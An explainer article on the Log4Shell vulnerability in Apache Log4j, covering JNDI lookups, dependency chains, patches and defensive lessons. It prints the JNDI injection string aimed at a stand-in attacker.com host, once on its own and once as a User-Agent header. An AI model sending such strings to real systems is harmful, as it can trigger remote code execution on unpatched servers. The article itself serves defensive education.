Log4Shell: How a Logging Library Became the Internet's Worst Day

Picture the on call engineer at a large company on the evening of Friday the 10th of December 2021. Their phone lights up. Then it lights up again. Within an hour, security teams all over the world are cancelling their weekends, dialling into emergency calls, and asking the same frightened question: are we running Log4j, and if so, where? The cause of the chaos was not a glamorous zero day in an operating system or a clever new class of attack. It was a humble logging library, Apache Log4j, that quietly evaluated text it was only ever meant to write down. This is a breakdown of Log4Shell: how it worked, why it was everywhere, and the lesson it left behind.

Credit and scope

Log4Shell was discovered by Chen Zhaojun of the Alibaba Cloud Security Team, who reported it responsibly to Apache. This is my explainer of how the flaw worked, not original research. It is written for defenders and learners.

First, what is a logging library?

Before we get to the bug, let us set the scene in plain language. A logging library is a piece of code that applications use to write down what they are doing. Every time a website handles a request, an error occurs, or a user signs in, the application usually records a line of text somewhere so that humans can read it later. Think of it as the application keeping a diary.

Log4j is one of the most popular logging libraries in the Java world. Java is a programming language used to build an enormous amount of business software, from banking systems to online games to the servers behind mobile apps. If you wrote Java, you very likely reached for Log4j to handle your diary keeping. That popularity is a big part of the story.

The one feature that caused it all

Somewhere along the way, Log4j gained a feature that sounded helpful: message lookups. The idea was that a log message could contain a special placeholder written as ${...}, and Log4j would expand it, substituting in a value. It is a bit like a word processor's mail merge, where ${name} in a template gets replaced with the real name before the letter is printed.

That convenience feature was flexible. Too flexible. One of the lookups it supported was JNDI, which stands for the Java Naming and Directory Interface. JNDI is a way for Java programs to fetch objects and data from remote services over network protocols like LDAP, a directory protocol often used inside company networks. Put those two facts side by side and you have the whole vulnerability in a single line:

${jndi:ldap://attacker.com/a}

If that string ended up inside a log message, Log4j would treat it as an instruction rather than plain text. It would reach out over the network to attacker.com, fetch a Java object, and load it into the running application. Here is the fatal part: loading an attacker controlled Java class means running attacker controlled code. That is remote code execution, the most severe outcome in security, triggered by nothing more than writing a line of text to a log.

What remote code execution means

Remote code execution, often shortened to RCE, means an attacker can run their own commands on your machine over the network without ever sitting in front of it. It is the digital equivalent of a stranger being able to reach through your front door and use your kitchen. Once someone can run code on a server, they can usually read its data, install more tools, and move deeper into the network.

Why logging anything was dangerous

Here is what turned a strange feature into a global catastrophe. Applications log untrusted input all the time as a matter of routine. They log usernames, search queries, error messages, and HTTP headers such as the User-Agent string that your browser sends with every request. They log chat messages, form fields, and file names. Anywhere an application recorded something that an attacker could influence, the attacker could smuggle in the magic string.

Attacker sets header:    User-Agent: ${jndi:ldap://attacker.com/x}
Server logs the header ->  Log4j expands it  ->  server fetches and runs attacker code

There was no login required and no special access needed. If you could get your text logged, and almost everything gets logged, you could potentially take over the server. The examples that circulated in the first days were almost comical. People discovered they could trigger the flaw by renaming their iPhone, by typing the string into a game's chat box, or by putting it in a field on a web form. In each case the target system dutifully wrote the string to a log, and Log4j did the rest.

To understand why this felt so different from a normal bug, walk through the two stages of the attack. In the first stage, the attacker plants the string and the server sends an outbound request to a machine the attacker controls. In the second stage, that attacker machine answers back with a malicious Java class, which the server downloads and runs. The victim's own server does the heavy lifting. It reaches out, collects the payload, and executes it, all because it was trying to be helpful with a log entry.

Why the blast radius was the whole internet

Log4j is one of the most widely used Java libraries in existence, buried deep inside countless applications and appliances as a dependency of a dependency. Many teams did not even know they were running it. That is what turned one bug into an industry wide emergency, and it scored the maximum CVSS of 10.0.

Dependency of a dependency, explained

That phrase, a dependency of a dependency, deserves unpacking because it is the heart of the story. When you build software today, you rarely write everything yourself. You pull in libraries written by other people to save time. Those libraries pull in their own libraries, which pull in more again. The result is a deep stack of components, most of which you never chose directly and may never have heard of.

Imagine ordering a coffee. You chose the cafe, but you did not choose the farm that grew the beans, the mill that processed them, or the trucking company that delivered them. If one of those hidden suppliers had a problem, your coffee is affected even though you never dealt with them. Log4j sat several suppliers deep in millions of software supply chains. A team might have installed a single well known product, unaware that somewhere inside it, three or four layers down, sat a copy of Log4j waiting to be triggered.

This is why the first question on every emergency call was not how do we fix it but where even is it. You cannot patch what you cannot find.

Fixing it

The immediate response came in layers as understanding improved. Nobody got it perfectly right on the first attempt, which is itself a useful lesson about incident response under pressure.

Update Log4j. Version 2.15.0 disabled the dangerous behaviour, 2.16.0 removed message lookups and JNDI by default, and the 2.17.x line fixed a follow up denial of service issue that emerged as researchers kept digging. Getting onto a current release is the real fix, not a workaround.
Remove the vulnerable class. Where updating quickly was impossible, teams stripped the JndiLookup class out of the packaged jar file as a stopgap. If the dangerous component is not present, it cannot be abused.
Block outbound connections. Egress filtering, which means controlling what a server is allowed to connect out to, breaks the second stage of the attack. If the server cannot reach the attacker's machine to fetch the malicious class, the exploit stalls even when the string gets logged.

Workarounds are not the finish line

Several early mitigations that people relied on turned out to be incomplete, including a system property that was supposed to switch the behaviour off. Stopgaps buy time, and buying time under this kind of pressure is valuable, but they are not a substitute for actually updating the library. Treat a workaround as a way to get to Monday, not as the end of the job.

The real lesson: you run code you have never seen

Log4Shell was not really about one feature. It was about the modern reality that every application is a tower of dependencies, and a flaw in one obscure layer at the bottom becomes everyone's problem at the top. The convenience feature was the trigger, but the true cause was that the entire industry had built on shared foundations without keeping track of what those foundations were.

The takeaways outlived the bug:

Know what you ship. A software bill of materials, which is simply a full inventory of every component and version inside your product, is what lets you answer "are we affected" in minutes instead of days. During Log4Shell, the teams with an accurate inventory slept. The teams without one spent the weekend grepping through servers by hand.
Assume dependencies will fail. Egress filtering and least privilege, which means giving each process only the access it truly needs, limit the damage when, not if, a component turns out to be exploitable. Defence in depth is what stands between one bad library and a full breach.
Patch paths matter. The teams that recovered fastest were the ones who could roll an updated dependency out quickly and everywhere. If pushing a new version of a library takes weeks in normal times, it will take weeks during an emergency too.

If you enjoy this style of "one small thing caused a global mess" story, two other classics are worth your time. Heartbleed shows how a single missing length check leaked private keys straight out of server memory, and Shellshock shows how a decades old feature in a common shell became instant remote code execution. All three share the same underlying theme, which is what makes them such good teachers.

The takeaway

Log4Shell turned an innocent convenience feature into remote code execution, and a ubiquitous dependency turned that into a global incident. The immediate fix was to update Log4j, but the lasting lesson is bigger. You are responsible for code you never wrote and often cannot see, so the job is to know your dependencies, contain them with layered defences, and be able to patch them fast, all before one of them surprises you on a Friday night.